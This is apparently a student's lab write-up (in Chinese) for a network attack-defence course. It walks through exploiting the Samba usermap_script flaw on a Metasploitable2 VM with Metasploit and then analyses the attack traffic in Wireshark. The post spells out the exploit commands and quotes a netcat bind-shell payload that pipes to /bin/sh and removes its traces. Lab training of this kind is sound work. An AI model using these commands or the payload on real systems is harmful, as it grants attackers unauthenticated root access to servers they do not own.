20252811 2025-2026-2 《网络攻防实践》第七周作业

一、实践内容:

1.1 实验要求


(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。


1.2 知识点梳理

** Usermap_script漏洞原理**

该漏洞源于 Samba 服务中 username map script 这一配置选项。当此选项被启用时,Samba 会使用一个外部脚本将客户端提供的用户名映射到本地系统用户。

攻击者可以构造一个包含特殊 Shell 元字符/nohup <恶意命令>。由于 Samba 在处理这个用户名时没有进行充分的安全过滤,系统会错误地将反引号内的内容当作 Shell 命令来执行。

最关键的一点是,这个用户名映射过程发生在用户身份验证之前,因此攻击者无需任何有效凭据即可利用此漏洞,直接以 Samba 服务的权限(通常是高权限)执行任意命令,从而完全控制目标服务器。


二、实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

首先准备Kali虚拟机,Metasploitable2-Linux虚拟机,将这两台虚拟机选择桥接模式,并相互ping检测连通性


1.00

Kali IP 192.168.3.143


1.00


Metasploitable2 IP 192.168.3.142


1.00

连通性测试,然后在Kali启动msfconsole

输入命令

msfconsole


1.00

搜索实验要求的漏洞模块

输入命令

search samba usermap_script

1.00

使用该模块

输入命令

use exploit/multi/samba/usermap_script

1.00

输入攻击参数,设置payload 双方IP并开始攻击

输入命令

set payload cmd/unix/bind_netcat

set RHOST 192.168.3.142

set LHOST 192.168.3.143

exploit

1.00

输入若干指令,显示结果表明攻击成功

0.84


2.2 攻防对抗实践

在Kali中启动wireshark并开始攻击

下图为完整的攻击数据包

0.71

下图为tcp数据流0

1.00

下图为tcp数据流2

1.00

通过分析数据流0可知:

本次攻击通过 Metasploit 框架的 multi/samba/usermap_script 模块,向目标主机发送了包含 Netcat 反向 Shell 的恶意载荷。核心命令如下:

nohup mkfifo /tmp/fwxsi; (nc -l -p 4444 || nc -l 4444) 0</tmp/fwxsi | /bin/sh >/tmp/fwxsi 2>&1; rm /tmp/fwxsi

该命令通过以下步骤实现持久化远程控制:

  1. 后台运行nohup 确保命令在后台持续执行,不受终端关闭影响;
  2. 管道创建mkfifo /tmp/fwxsi 生成临时命名管道,用于进程间数据传递;
  3. 端口监听nc -l -p 4444 启动 Netcat 监听 4444 端口,等待攻击者连接;
  4. 命令执行/bin/sh 作为命令行解释器,通过管道与 Netcat 交互,形成“输入-执行-输出”的闭环;
  5. 痕迹清理rm /tmp/fwxsi 在命令执行后删除临时管道文件,规避检测。

分析数据流2可知:

  • 指令交互:左侧为输入的指令(如 echowhoamiip a),右侧为靶机的标准输出,证明命令执行通道畅通。
  • 权限确认whoami 返回 root,确证攻击者已直接获得系统最高控制权,无需后续提权。
  • 环境验证ip a 显示靶机 IP 为 192.168.3.142,与攻击目标一致,且识别出其为 VMware 虚拟机环境。

三 、实验遇到的困难

四、实验总结

本次实验围绕后门漏洞渗透展开,通过实操完成了漏洞模块检索、参数配置、载荷调用等渗透攻击流程,并借助Wireshark开展流量抓包与攻击溯源。通过训练,我熟练掌握了msfconsole的基础操作及Linux高危漏洞的利用方法,深刻认识到老旧服务存在的安全隐患。后续我将持续深化网络攻防知识学习,研究安全防护技术,进一步提升网络攻防实操能力。

posted @ 2026-05-09 20:28  dyf12345  阅读(19)  评论(0)    收藏  举报